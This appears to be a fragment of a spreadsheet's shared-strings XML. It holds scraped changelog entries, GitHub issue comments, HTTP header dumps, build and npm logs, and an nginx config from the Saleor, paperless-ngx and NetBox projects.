    <t>/core/utils/anonymization` code instead. - by @aniav. - Require the `type` field on `PromotionCreateInput` - #16296 by @IKarbowiak. ### Deprecated. - Deprecate `EU` from `CountryCode` enum - #16300 by @IKarbowiak. - `EU` is not a country code and might cause a misconfiguration. - Deprecate the `taxTypes` query - #15802 by @maarcingebala. ### GraphQL API. - Add `translatableContent` to all translation types; add translated object id to all translatable content types - #15617 by @zedzior. - Add the `Channel.taxConfiguration` field - #15610 by @Air-t. - Add the `Warehouse.stocks` field - #15771 by @teddyondieki. - Change permissions for `checkout` and `checkouts` queries. Add `HANDLE_PAYMENTS` to required permissions - #16010 by @Air-t. - Change the `checkoutRemovePromoCode` mutation behavior to throw a `ValidationError` when the promo code is not detached from the checkout. - #16109 by @Air-t. ### Other changes. - Remove `prefetched_for_webhook` queryset for legacy payload generators - #15369 by @AjmalPonneth. - Don't raise `InsufficientStock` for inventory tracking for variants is disabled - #15475 by @carlosa54. - DB performance improvements in attribute dataloaders - #15474 by @AjmalPonneth. - Calculate order promotions in draft orders - #15459 by @zedzior. - Prevent name overwriting of product variants when updating product types - #15670 by @teddyondieki. - Added support for the `BrokerProperties` custom header to webhooks to support Azure Service Bus - #15899 by @patrys. - Fixed a rare crash in the introspection query detection code - #15966 by @patrys. - Added HTTP compression telemetry - #16125 by @patrys. - Implement login throttling - #16219 by @zedzior. - Introduce the `allow_writer` context manager to explicitly control when the writer database should be used - #15651 by @maarcingebala. - Improve performance of the `productVariants` resolvers by using JOINs instead of subqueries - #16262 by @maarcingebala. - Extend valid address values - #15877 by @zedzior</t>
  </si>
  <si>
    <t>* Implement login throttling (#16261) (98703d644e)</t>
  </si>
  <si>
    <t>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`orderSettings` input. - Deprecate `Shop.orderSettings` query. Use `Channel.orderSettings` query instead. - Deprecate `Shop.orderSettingsUpdate` mutation. Use `Channel.channelUpdate` instead. - Add meta fields to `ProductMedia` model - #11894 by @zedzior. - Make `oldPassword` argument on `passwordChange` mutation optional; support accounts without usable passwords - @11999 by @rafalp. - Introduce custom headers for webhook requests - #11978 by @zedzior. - Fix saving `metadata` in `ProductVariantBulkCreate` and `ProductVariantBulkupdate` mutations - #12097 by @SzymJ. - Improve GraphQL playground by storing headers in the local storage - #12176 by @zaiste. - Fixes for GraphiQL playground - #12192 by @zaiste. ### Other changes. - Enhance webhook's subscription query validation. Apply the validation and event inheritance to manifest validation - #11797 by @zedzior. - Fix GraphQL playground when the `operationName` is set across different tabs - #11936 by @zaiste. - Add new asynchronous events related to media - #11918 by @zedzior. - `PRODUCT_MEDIA CREATED`. - `PRODUCT_MEDIA_UPDATED`. - `PRODUCT_MEDIA_DELETED`. - `THUMBNAIL_CREATED`. - CORS is now handled in the ASGI layer - #11415 by @patrys. - Added native support for gzip compression - #11833 by @patrys. - Set flat rates as the default tax calculation strategy - #12069 by @maarcingebala. - Enables flat rates for channels in which no tax calculation method was set. - Users created by the OIDC plugin now have unusable password set instead of empty string - #12103 by @rafalp</t>
  </si>
  <si>
    <t>uality-of-life improvements. - Changes in order dashboard. - [https://docs.saleor.io/docs/3.0/dashboard/orders](https://docs.saleor.io/docs/3.0/dashboard/orders). - Reissues. - Refunds. - Improvements for adding a discount. - Discount for line and the whole order. - Add a possibility to provide external payment ID during the conversion draft order to order. - Shipping. - [https://docs.saleor.io/docs/3.0/dashboard/configuration/shipping](https://docs.saleor.io/docs/3.0/dashboard/configuration/shipping). - The ability to restrict shipping zones based on postal codes. - Excluding certain products from shipping. - Add a description to zones and methods. - Add delivery days. - Products and pages can be fetched by slug. - Accounts:. - New field for customer language. - Added new types of attributes. - References. - Products. - Pages. - Numerical attribute. - File attribute. - Add downloadable content like instruction PDFs. - Storefront. - NextJS framework implemented in demo storefront. - SSR . - Improved documentation and guides. - Improved Products, Orders, Customers filtering. ## Extensibility. - Updated documentation with developer guides: [https://docs.saleor.io/docs/3.0/developer/extending/apps/key-concepts](https://docs.saleor.io/docs/3.0/developer/extending/apps/key-concepts). - Apps:. - Sync webhooks for payments. - New transport protocols:. - Google Cloud Pub/Sub. - AWS SQS. - New webhook events. - NOTIFY event. - Plugins. - Configuration of plugin for each channel. - Change plugin webhook endpoint:. - Use `/plugins/channel/&lt;channel_slug&gt;/&lt;plugin_id&gt;` for plugins with channel configuration. - Use `/plugins/global/&lt;plugin_id&gt;` for plugins with global configuration. - Plugin support for external authentication with OAuth. - [https://docs.saleor.io/docs/3.0/developer/available-plugins/openid-connect](https://docs.saleor.io/docs/3.0/developer/available-plugins/openid-connect). - Email plugin interface. - Plugins for Admin and Customers emails. - [https://docs.saleor</t>
  </si>
  <si>
    <t>@stumpylog The link you have added points to the same thing I found before, and based on that it's not a bug of watchtower, but an upstream issue with buildx. https://github.com/containrrr/watchtower/discussions/1529. &gt; This is due to a new format of the manifest that is produced with the new version of docker buildx. The only consequence is that the docker API rate limiting will be applied to every check for an image update, so as long as you don't use a really short interval for watchtower it should be fine. In that case you can set the WATCHTOWER_WARN_ON_HEAD_FAILURE=never environment variable for watchtower, or add the equivalent argument --warn-on-head-failure never (see https://containrrr.dev/watchtower/arguments/#head_failure_warnings). &gt; . &gt; If you are responsible for creating said image, you can look at the upstream bug for ways to opt-out of the unsupported manifest until it's supported: https://github.com/docker/buildx/issues/1509#issuecomment-1378538197</t>
  </si>
  <si>
    <t>Yeah I agree this is probably not the most useful way of large volume data ingress, but I couldn't think of a better way to do it. Once my data is all across, I'll be using more "normal" methods. I'll definitely tolerate the rate limit - there's no rush on import as long at is reliable. As I mentioned in my comment after the original report, I am using consumer polling not inotify (on macos) - should have put that in the bug report. Many thanks again for the fix.</t>
  </si>
  <si>
    <t>The *bug* is located in. https://github.com/paperless-ngx/paperless-ngx/blob/ca73c0d1f36a33f28dd67849869eb4822c919a51/src/documents/views.py#L280. Here it decides to call `TagSerializer1` (which ignores the color settings) based upon `int(self.request.version)` which is set in the POST Header when using the Web Interface. ```. POST /api/tags/ HTTP/1.1. Accept: application/json; version=5. Accept-Encoding: gzip, deflate, br. Accept-Language: en-US,en;q=0.9,de;q=0.8. Cache-Control: no-cache. Connection: keep-alive. Content-Length: 210. Content-Type: application/json. ```. `Accept: application/json; version=5` can be set in the commandline with. ```. curl -s -H "version: 5" -H 'Authorization: Token tiktopdeadbeef ' http://localhost:8880/api/tags/ --json "$(jq -n --arg a1 TAG$RANDOM --arg a2 '#1f78b4' '{"name": $a1, "color": $a2}')"| jq -Mr. ```. Setting `-H "version: 5"` or to any other value but "1" fixes it for me, but it smells funny. There is an `x-api-version` request header which seems more suitable than using `self.request.version` in `views.py`.</t>
  </si>
  <si>
    <t>Now there was an error message:. Übersicht. URL: https://meineURL/api/correspondents/?page=1&amp;page_size=100000. Status: 504. Quelle: Netzwerk. Adresse: meineIPv6. Initiator: . polyfills.js:1:32482. Anfrage. :method: GET. :scheme: https. :authority: meineURL. :path: /api/correspondents/?page=1&amp;page_size=100000. Accept: application/json; version=5. Accept-Encoding: gzip, deflate, br. Accept-Language: de-DE,de;q=0.9. Connection: keep-alive. Cookie: csrftoken=kSaAzUCHANGEDchangedZ9dsS; sessionid=ucqoCHANGEDchangedq63. Host: meineURL. Referer: https://meineURL/view/7. Sec-Fetch-Dest: empty. Sec-Fetch-Mode: cors. Sec-Fetch-Site: same-origin. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15. X-CSRFToken: kSaAzCHANGEDchanged9dsS. Antwort. :status: 504. Content-Length: 11939. Content-Type: text/html. Date: Mon, 20 May 2024 07:50:56 GMT. ETag: "64cCHANGEDchanged-2ea3". Server: nginx. Strict-Transport-Security: max-age=15768000; includeSubdomains; preload. Parameter der Abfragezeichenkette. page: 1. page_size: 100000.</t>
  </si>
  <si>
    <t>Thanks for the feedback. I changed the implementation and made `delete_originals` a parameter to the `merge` function on both API and code in the backend. The `merge_and_delete_originals` method is gone. Permission checks are adapted (as mentioned by me, this became more complex). Frontend is adapted as well and test coverage is achieved for all border cases (Code-Coverage here in the PR does not update due to an error in the CI/CD: "Tokenless has reached GitHub rate limit. Please upload using a token: https://docs.codecov.com/docs/adding-the-codecov-token. Expected available in 1309 seconds."). &gt; To clarify, I mean that I think the delete operation should only happen after successful consumption of the merged doc, which yes, is queued and performed asynchronously. I'm unsure here how to do this. We would need an additional celery task for the deletion and somehow chain it with the consumption (so make one celery task depend on the other). I'm really unsure if it is worth the effort and the complexity. A big challenge will be writing good tests for this. I personally don't see a big value in it, the deletion only happens after a successful merge. I don't know how to pull this off. If you insist on this, then I would have retract the whole PR and leave the implementation to someone more knowledgable with celery tasks. . Let me know what you think about this solution and if you are willing to proceed with this implementation as well for the split.</t>
  </si>
  <si>
    <t>es,jammy-security,now 2.2.27-3ubuntu2.1 amd64 [installed,automatic]. gpgconf/jammy-updates,jammy-security,now 2.2.27-3ubuntu2.1 amd64 [installed,automatic]. gpgsm/jammy-updates,jammy-security,now 2.2.27-3ubuntu2.1 amd64 [installed,automatic]. gpgv/jammy-updates,jammy-security,now 2.2.27-3ubuntu2.1 amd64 [installed,automatic]. grep/jammy,now 3.7-1build1 amd64 [installed]. groff-base/jammy,now 1.22.4-8build1 amd64 [installed,automatic]. grub-common/jammy-updates,now 2.06-2ubuntu7.2 amd64 [installed,automatic]. grub-efi-amd64-bin/jammy-updates,jammy-security,now 2.06-2ubuntu14.4 amd64 [installed,automatic]. grub-efi-amd64-signed/jammy-updates,jammy-security,now 1.187.6+2.06-2ubuntu14.4 amd64 [installed,automatic]. grub-gfxpayload-lists/jammy,now 0.7 amd64 [installed,automatic]. grub-pc-bin/jammy-updates,now 2.06-2ubuntu7.2 amd64 [installed,automatic]. grub-pc/jammy-updates,now 2.06-2ubuntu7.2 amd64 [installed]. grub2-common/jammy-updates,now 2.06-2ubuntu7.2 amd64 [installed,automatic]. gzip/jammy-updates,now 1.10-4ubuntu4.1 amd64 [installed]. hdparm/jammy,now 9.60+ds-1build3 amd64 [installed,automatic]. hostname/jammy,now 3.23ubuntu2 amd64 [installed]. htop/jammy,now 3.0.5-7build2 amd64 [installed,automatic]. info/jammy,now 6.8-4build1 amd64 [installed,automatic]. init-system-helpers/jammy,now 1.62 all [installed,automatic]. init/jammy,now 1.62 amd64 [installed]. initramfs-tools-bin/jammy-updates,now 0.140ubuntu13.4 amd64 [installed,automatic]. initramfs-tools-core/jammy-updates,now 0.140ubuntu13.4 all [installed,automatic]. initramfs-tools/jammy-updates,now 0.140ubuntu13.4 all [installed,automatic]. install-info/jammy,now 6.8-4build1 amd64 [installed,automatic]. iproute2/jammy,now 5.15.0-1ubuntu2 amd64 [installed,automatic]. iptables/jammy-updates,now 1.8.7-1ubuntu5.2 amd64 [installed,automatic]. iputils-ping/jammy,now 3:20211215-1 amd64 [installed,automatic]. iputils-tracepath/jammy,now 3:20211215-1 amd64 [installed,automatic]. irqbalance/jammy-updates,now 1.8.0-1ubu</t>
  </si>
  <si>
    <t>@shamoon The example code logs the folling lines. ```. http-outgoing-0 &gt;&gt; POST /api/documents/post_document/ HTTP/1.1. http-outgoing-0 &gt;&gt; Accept: text/plain, */*. http-outgoing-0 &gt;&gt; Authorization: Token xxx. http-outgoing-0 &gt;&gt; Content-Type: multipart/form-data;boundary=hox6W2mDk8VSuXDEu3fgs7jlzXq_2UFjM2. http-outgoing-0 &gt;&gt; Accept-Encoding: gzip, x-gzip, deflate. http-outgoing-0 &gt;&gt; Transfer-Encoding: chunked. http-outgoing-0 &gt;&gt; Host: localhost. http-outgoing-0 &gt;&gt; Connection: keep-alive. http-outgoing-0 &gt;&gt; User-Agent: Apache-HttpClient/5.2.3 (Java/21.0.2). ... http-outgoing-0 &lt;&lt; "HTTP/1.1 400 Bad Request[\r][\n]". http-outgoing-0 &lt;&lt; "date: Fri, 03 Jan 2025 06:21:42 GMT[\r][\n]". http-outgoing-0 &lt;&lt; "server: uvicorn[\r][\n]". http-outgoing-0 &lt;&lt; "content-type: application/json[\r][\n]". http-outgoing-0 &lt;&lt; "vary: Accept, Accept-Language, origin, Cookie[\r][\n]". http-outgoing-0 &lt;&lt; "allow: POST, OPTIONS[\r][\n]". http-outgoing-0 &lt;&lt; "x-frame-options: SAMEORIGIN[\r][\n]". http-outgoing-0 &lt;&lt; "x-api-version: 5[\r][\n]". http-outgoing-0 &lt;&lt; "x-version: 2.13.5[\r][\n]". http-outgoing-0 &lt;&lt; "content-length: 39[\r][\n]". http-outgoing-0 &lt;&lt; "content-language: en-us[\r][\n]". http-outgoing-0 &lt;&lt; "x-content-type-options: nosniff[\r][\n]". http-outgoing-0 &lt;&lt; "referrer-policy: same-origin[\r][\n]". http-outgoing-0 &lt;&lt; "cross-origin-opener-policy: same-origin[\r][\n]". ```. If I understand correctly: . I use HTTP/1.1. Paperless responds with HTTP/1.1. RFC9112 (https://datatracker.ietf.org/doc/html/rfc9112) defines in section 6.1:. &gt; A recipient MUST be able to parse the chunked transfer coding [...]. So, the system uses HTTP/1.1 but does not work as requested. I think this is a bug. And I hope that there is no self-implemented http-server in paperless. So, the problem could be solved by updating the http-server or creating an issue for the http-server. My problem is solved by using `BufferingClientHttpRequestFactory`. But I spend some time to find the problem because the error message "{"do</t>
  </si>
  <si>
    <t>&gt; What is the API request and response? You can view that in the network tab (usually F12). ### Request:. GET /api/documents/?page=1&amp;page_size=50&amp;ordering=-custom_field_3&amp;truncate_content=true HTTP/2. Host: XXXXXXXXXXXXXXXXXXXXXXXXXX. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0. Accept: application/json; version=7. Accept-Language: de-DE,en;q=0.8,de;q=0.5,en-GB;q=0.3. Accept-Encoding: gzip, deflate, br, zstd. Referer: https://XXXXXXXXXXXXXXXXXXXXXXXXXX/documents. X-CSRFToken: NHuHdGown2xxepNYY61i8lkTUjLaw5X5. Connection: keep-alive. Cookie: csrftoken=NHuHdGown2xxepNYY61i8lkTUjLaw5X5; django_language=en-gb; sessionid=fyjhjh45hdlskhjzdc62rchzljrcubjx. Sec-Fetch-Dest: empty. Sec-Fetch-Mode: cors. Sec-Fetch-Site: same-origin. Priority: u=0. ----. ### Response:. HTTP/2 400 . server: openresty. date: Sat, 15 Feb 2025 22:32:24 GMT. content-type: application/json. content-length: 45. vary: Accept, Accept-Language, origin, Cookie. allow: GET, HEAD, OPTIONS. x-frame-options: SAMEORIGIN. x-api-version: 7. x-version: 2.14.7. content-language: en-gb. x-content-type-options: nosniff. referrer-policy: same-origin. cross-origin-opener-policy: same-origin. strict-transport-security: max-age=63072000; preload. X-Firefox-Spdy: h2. {"custom_field_3":["Custom field not found"]}.</t>
  </si>
  <si>
    <t>Please retry after switching the language to German in the user's profile. I was able to reproduce on a colleague's machine, after he could not reproduce in English. 🤞</t>
  </si>
  <si>
    <t>/browser-sync-client. npm http GET https://registry.npmjs.org/browser-sync-ui. npm http GET https://registry.npmjs.org/chokidar. npm http GET https://registry.npmjs.org/dev-ip. npm http GET https://registry.npmjs.org/connect. npm http GET https://registry.npmjs.org/easy-extender. npm http GET https://registry.npmjs.org/eazy-logger. npm http GET https://registry.npmjs.org/emitter-steward. npm http GET https://registry.npmjs.org/foxy. npm http GET https://registry.npmjs.org/localtunnel. npm http GET https://registry.npmjs.org/immutable. npm http GET https://registry.npmjs.org/longest. npm http GET https://registry.npmjs.org/meow. npm http GET https://registry.npmjs.org/pad-left. npm http GET https://registry.npmjs.org/portscanner. npm http GET https://registry.npmjs.org/resp-modifier. npm http GET https://registry.npmjs.org/query-string. npm http GET https://registry.npmjs.org/serve-index. npm http GET https://registry.npmjs.org/serve-static. npm http GET https://registry.npmjs.org/socket.io. npm http GET https://registry.npmjs.org/ucfirst/0.0.1. npm http GET https://registry.npmjs.org/ua-parser-js. npm http 304 https://registry.npmjs.org/onetime. npm http 304 https://registry.npmjs.org/set-immediate-shim. npm http 304 https://registry.npmjs.org/async-each-series. npm http 304 https://registry.npmjs.org/anymatch. npm http 304 https://registry.npmjs.org/browser-sync-client. npm http 304 https://registry.npmjs.org/browser-sync-ui. npm http 304 https://registry.npmjs.org/dev-ip. npm http 304 https://registry.npmjs.org/connect. npm http 304 https://registry.npmjs.org/easy-extender. npm http 304 https://registry.npmjs.org/chokidar. npm http 304 https://registry.npmjs.org/eazy-logger. npm http 304 https://registry.npmjs.org/foxy. npm http 304 https://registry.npmjs.org/emitter-steward. npm http 304 https://registry.npmjs.org/longest. npm http 304 https://registry.npmjs.org/localtunnel. npm http 304 https://registry.npmjs.org/immutable. npm http 304 https://registry.npmjs.or</t>
  </si>
  <si>
    <t>tic@1.1.5 . remote: │ │ │ │ └── repeat-string@1.5.4 . remote: │ │ │ ├── preserve@0.2.0 . remote: │ │ │ └── repeat-element@1.1.2 . remote: │ │ ├─┬ expand-brackets@0.1.5 . remote: │ │ │ └── is-posix-bracket@0.1.1 . remote: │ │ ├── extglob@0.3.2 . remote: │ │ ├── filename-regex@2.0.0 . remote: │ │ ├── is-extglob@1.0.0 . remote: │ │ ├─┬ kind-of@3.0.2 . remote: │ │ │ └── is-buffer@1.1.3 . remote: │ │ ├── normalize-path@2.0.1 . remote: │ │ ├─┬ object.omit@2.0.0 . remote: │ │ │ ├─┬ for-own@0.1.4 . remote: │ │ │ │ └── for-in@0.1.5 . remote: │ │ │ └── is-extendable@0.1.1 . remote: │ │ ├─┬ parse-glob@3.0.4 . remote: │ │ │ ├── glob-base@0.3.0 . remote: │ │ │ └── is-dotfile@1.0.2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t>
  </si>
  <si>
    <t>socket.io-adapter</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>socket.io-parser</t>
  </si>
  <si>
    <t xml:space="preserve">.4.3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t>
  </si>
  <si>
    <t xml:space="preserve">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 ├── lodash.keys@4.0.6 . remote: │ │ └── lodash.rest@4.0.2 . remote: │ ├─┬ pkg-conf@1.1.2 . remote: │ │ </t>
  </si>
  <si>
    <t>gzip-size</t>
  </si>
  <si>
    <t>.5 . remote: │ │ ├─┬ clean-css@2.2.23 . remote: │ │ │ └── commander@2.2.0 . remote: │ │ ├── graceful-fs@3.0.8 . remote: │ │ ├── mime@1.2.11 . remote: │ │ ├─┬ request@2.40.0 . remote: │ │ │ ├── aws-sign2@0.5.0 . remote: │ │ │ ├── forever-agent@0.5.2 . remote: │ │ │ ├─┬ form-data@0.1.4 . remote: │ │ │ │ ├── async@0.9.2 . remote: │ │ │ │ └─┬ combined-stream@0.0.7 . remote: │ │ │ │ └── delayed-stream@0.0.5 . remote: │ │ │ ├─┬ hawk@1.1.1 . remote: │ │ │ │ ├── boom@0.4.2 . remote: │ │ │ │ ├── cryptiles@0.2.2 . remote: │ │ │ │ ├── hoek@0.9.1 . remote: │ │ │ │ └── sntp@0.2.4 . remote: │ │ │ ├── http-signature@0.10.1 . remote: │ │ │ ├── mime-types@1.0.2 . remote: │ │ │ ├── oauth-sign@0.3.0 . remote: │ │ │ └── qs@1.0.2 . remote: │ │ └─┬ source-map@0.1.31 . remote: │ │ └── amdefine@1.0.0 . remote: │ ├── lodash@2.4.2 . remote: │ └─┬ maxmin@0.1.0 . remote: │ ├─┬ chalk@0.4.0 . remote: │ │ ├── ansi-styles@1.0.0 . remote: │ │ ├── has-color@0.1.7 . remote: │ │ └── strip-ansi@0.1.1 . remote: │ ├─┬ gzip-size@0.1.1 . remote: │ │ ├─┬ concat-stream@1.5.1 . remote: │ │ │ ├─┬ readable-stream@2.0.6 . remote: │ │ │ │ └── isarray@1.0.0 . remote: │ │ │ └── typedarray@0.0.6 . remote: │ │ └─┬ zlib-browserify@0.0.3 . remote: │ │ └─┬ tape@0.2.2 . remote: │ │ ├── deep-equal@0.0.0 . remote: │ │ ├── defined@0.0.0 . remote: │ │ └── jsonify@0.0.0 . remote: │ └── pretty-bytes@0.1.2 . remote: ├─┬ grunt-contrib-watch@0.6.1 . remote: │ ├── async@0.2.10 . remote: │ ├─┬ gaze@0.5.2 . remote: │ │ └─┬ globule@0.1.0 . remote: │ │ ├── lodash@1.0.2 . remote: │ │ └── minimatch@0.2.14 . remote: │ ├── lodash@2.4.2 . remote: │ └─┬ tiny-lr-fork@0.0.5 . remote: │ ├── debug@0.7.4 . remote: │ ├── faye-websocket@0.4.4 . remote: │ ├─┬ noptify@0.0.3 . remote: │ │ └── nopt@2.0.0 . remote: │ └── qs@0.5.6 . remote: ├─┬ grunt-postcss@0.7.2 . remote: │ ├─┬ chalk@1.1.3 . remote: │ │ ├── ansi-styles@2.2.1 . remote: │ │ ├── has-ansi@2.0.0 . remote: │ │ └── supports-color@2.0.0 . remote: │ ├── diff@2.2.2 . remote: │ └── es6-promise@3</t>
  </si>
  <si>
    <t>We should use [django-static18n](https://django-statici18n.readthedocs.io/en/latest/) to serve JS files from our servers. . This way, files could be gzipped to save some space, moreover - we can defer them.</t>
  </si>
  <si>
    <t>gzipping</t>
  </si>
  <si>
    <t>I agree with this suggestion, that would save a lot of CPU time as well. But I'm not sure of what you hear about gzipping the files? You mean web server side (e.g. nginx)?</t>
  </si>
  <si>
    <t>Sending gzipped JS and CSS files would weight around 160KB altogether, but please note that on your local instance files won't be gzipped by default. The error seems not related to the big files, have you set up your buildpacks properly on Heroku? Saleor needs nodejs and python to work properly. How did you deploy, manually or via 'deploy to Heroku' button on our initial page?</t>
  </si>
  <si>
    <t>This is something to implement on the web server side (nginx, apache, ...), this is not the job of the application to ensure the correct request rates are being made. Especially for the case where there are multiple Saleor instances. It would decrease performances as it would require to keep the rates synchronized over the instances (e.g.: using redis, or calling another local machine), which would overwhelm the applications for nothing (even through session persistence). . The gateway (nginx, apache, etc.) needs to be the one handling the rate limiting.</t>
  </si>
  <si>
    <t>server-side renders</t>
  </si>
  <si>
    <t xml:space="preserve">ont:build: ├ ○ /[channel]/[locale]/order 494 B 263 kB. #15 261.5 storefront:build: ├ ● /[channel]/[locale]/page/[slug] 955 B 264 kB. #15 261.5 storefront:build: ├ ● /[channel]/[locale]/products/[slug] 4.01 kB 267 kB. #15 261.5 storefront:build: ├ ○ /[channel]/[locale]/search 1.64 kB 264 kB. #15 261.5 storefront:build: └ ○ /404 (1616 ms) 766 B 197 kB. #15 261.5 storefront:build: └ css/d671ab48dc86a1f9.css 1.51 kB. #15 261.5 storefront:build: + First Load JS shared by all 182 kB. #15 261.5 storefront:build: ├ chunks/framework-ceb470d8f68752fc.js 45.5 kB. #15 261.5 storefront:build: ├ chunks/main-2c4bd73a4a4b956c.js 35 kB. #15 261.5 storefront:build: ├ chunks/pages/_app-f0878ee07f1c59cb.js 93.7 kB. #15 261.5 storefront:build: ├ chunks/webpack-6ef43a8d4a395f49.js 999 B. #15 261.5 storefront:build: └ css/12e26599b9ad2537.css 7.24 kB. #15 261.5 storefront:build: . #15 261.5 storefront:build: ƒ Middleware 21.8 kB. #15 261.5 storefront:build: . #15 261.5 storefront:build: λ (Server) server-side renders at runtime (uses getInitialProps or getServerSideProps). #15 261.5 storefront:build: ○ (Static) automatically rendered as static HTML (uses no initial props). #15 261.5 storefront:build: ● (SSG) automatically generated as static HTML + JSON (uses getStaticProps). #15 261.5 storefront:build: . #15 319.1 saleor-app-checkout:build: Attention: Next.js now collects completely anonymous telemetry regarding usage. #15 319.1 saleor-app-checkout:build: This information is used to shape Next.js&amp;apos; roadmap and prioritize features. #15 319.1 saleor-app-checkout:build: You can learn more, including how to opt-out if you&amp;apos;d not like to participate in this anonymous program, by visiting the following URL:. #15 319.1 saleor-app-checkout:build: https://nextjs.org/telemetry. #15 319.1 saleor-app-checkout:build: . #15 330.1 saleor-app-checkout:build: ✔ No ESLint warnings or errors. #15 335.2 saleor-app-checkout:build: . #15 335.2 saleor-app-checkout:build: &amp;gt; saleor-app-checkout@0.0.0 </t>
  </si>
  <si>
    <t>In Cloud environments we can use these global metadata to expose an environment type (sandbox or prod) or request rate limit for Dashbaord users. . Globala metadata should be configurable by env varialbles and if apps or other integrations are about to relay on that, we should not allow dashbaord users to change this data. I think we need a way to determine if the data is exposed publicly (like schemaVersion in Shop query) e.g env type or availalbel only for staff users (like detailed `version` in Shop query) e.g. rate limit.</t>
  </si>
  <si>
    <t>&gt; In Cloud environments we can use these global metadata to expose an environment type (sandbox or prod) or request rate limit for Dashbaord users. &gt; . &gt; Globala metadata should be configurable by env varialbles and if apps or other integrations are about to relay on that, we should not allow dashbaord users to change this data. &gt; . &gt; I think we need a way to determine if the data is exposed publicly (like schemaVersion in Shop query) e.g env type or availalbel only for staff users (like detailed `version` in Shop query) e.g. rate limit. Good examples. Instead of relying on docs only, Saleor can expose its settings. Rate limiting is a good one. Another one can be URL to JWKS. Good question is about privacy. Do we want to have "all protected", "all public" or "mixed"?</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Add the /thumbnail/ path to Nginx. Uploaded a new photo to saleor-platform via Dashboard. . Still broken. Here is Nginx's config. server {. server_name saleor.tourdefarm.com;. root /var/www/html/saleor/;. access_log /var/log/nginx/saleor.tourdefarm.com.access.log;. error_log /var/log/nginx/saleor.tourdefarm.com.error.log;. index index.html index.php;. keepalive_timeout 70;. gzip on;. gzip_min_length 10240;. gzip_types text/plain text/css text/xml text/javascript application/x-javascript application/xml;. proxy_set_header X-Forwarded-Host $host;. proxy_set_header X-Forwarded-Server $host;. proxy_set_header X-Real-IP $remote_addr;. proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;. proxy_set_header Host $host;. proxy_http_version 1.1;. proxy_set_header Upgrade $http_upgrade;. proxy_set_header Connection "upgrade";. client_max_body_size 60M;. proxy_connect_timeout 300;. proxy_send_timeout 300;. proxy_read_timeout 300;. send_timeout 300;. location / {. proxy_pass http://saleor.tourdefarm.com:9000/;. }. location /thumbnail/ {. proxy_pass http://saleor.tourdefarm.com:8000/;. }. location /graphql/ {. proxy_pass http://saleor.tourdefarm.com:8000/graphql/; # &lt;- must end with /! }. location /graphql {. proxy_pass http://saleor.tourdefarm.com:8000/graphql/; # &lt;- must end with /! }. listen 443 ssl http2; # managed by Certbot. ssl_certificate /root/.acme.sh/saleor.tourdefarm.com_ecc/fullchain.cer;. ssl_certificate_key /root/.acme.sh/saleor.tourdefarm.com_ecc/saleor.tourdefarm.com.key;. include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot. ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot. }.</t>
  </si>
  <si>
    <t>uded in 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t>
  </si>
  <si>
    <t>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FhFZl4kx</t>
  </si>
  <si>
    <t>&gt; Can I morph this to a request for accepting abbreviations in the input fields (e.g. '1g' or '10g')? We should be able to create a custom form field that accepts values like "100m" or "1g" and translates the value to an integer during validation. &gt; Hmm, and now that I think of it, maybe pulling in the speed from the interface type when an interface is selected for a circuit would be nice too. That might be dangerous. It's common practice to set a 1GE interface to 100 Mbps to effect rate limiting, for example.</t>
  </si>
  <si>
    <t>&gt; As an example, introspection is currently broken for many (all?) SerializerMethodFields. The best you could do here is manually annotate the methods with their expected return types: https://drf-yasg.readthedocs.io/en/stable/custom_spec.html#support-for-serializermethodfield. I could open a quick PR with this if you'd like. &gt; One example: Swagger generates a single flat list of endpoints under /api/ instead of nesting them under their respective apps. I'm not seeing this when running netbox locally from the develop branch. Both ReDoc and swagger-ui group the endpoints by their first path component. &gt; and rendering all of these on a single page is very resource-intensive (to the point that my browser prompts me to kill the scripts). This is a real issue, with a two-sided cause:. - due to some unfortunate design choices, drf-yasg is quite slow; on my machine the XHR request for the swagger document takes around 10 seconds, and there's not really much that can be done to improve this. - drf-yasg configures swagger-ui with a default `defaultModelsExpandDepth` of 3, which means the models section at the bottom is fully expanded; this is the main cause of the initial stuttering . You could mitigate the first point by either. a. caching the generated schema. b. pre-rendering the schema during packaging, deployment or app startup. &gt; (NetBox also exposes the documentation rendered with Redoc, but it has the same issue.). There is an EXPAND_RESPONSES setting for ReDoc similar to above, but it doesn't have as much of an effect - ReDoc is slower than swagger-ui in general. You can further mitigate this by pre-rendering the whole HTML page using [https://github.com/Rebilly/ReDoc/blob/master/cli/README.md](redoc-cli).</t>
  </si>
  <si>
    <t>Unfortunately we've had issues with even patch updates in dependencies introducing backward-incompatible changes. Aside from Django, we pin all dependencies to a known good release until NetBox's next minor version bump. If a user requires alternate versions of required packages installed, the conventional advice is to install NetBox within a Python virtual environment (which isn't a bad idea anyway). I'm not sure whether that's an option you have. It's up to you however you'd like to approach this, but I feel obligated to mention two points:. 1. NetBox is under heavy development and releases are fairly frequent: on the order of 2-3 weeks, typically. 2. We can't accept bug reports relating to installation issues outside of our control (e.g. distro or container-based packaging). I'm going to close this issue out but please feel free to continue the discussion on our [mailing list](https://groups.google.com/forum/#!forum/netbox-discuss) if you'd like. Thanks!</t>
  </si>
  <si>
    <t>Things like scopes of authorization, quotas/throttling, and so forth can be associated with an API key, so the HMAC signature alone is an incomplete solution.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Regarding performance, if we adopt anything more complex than the current rendering logic, we'll likely move to saving pre-rendered content in the database alongside the raw content. This would require rendering only at write time.</t>
  </si>
  <si>
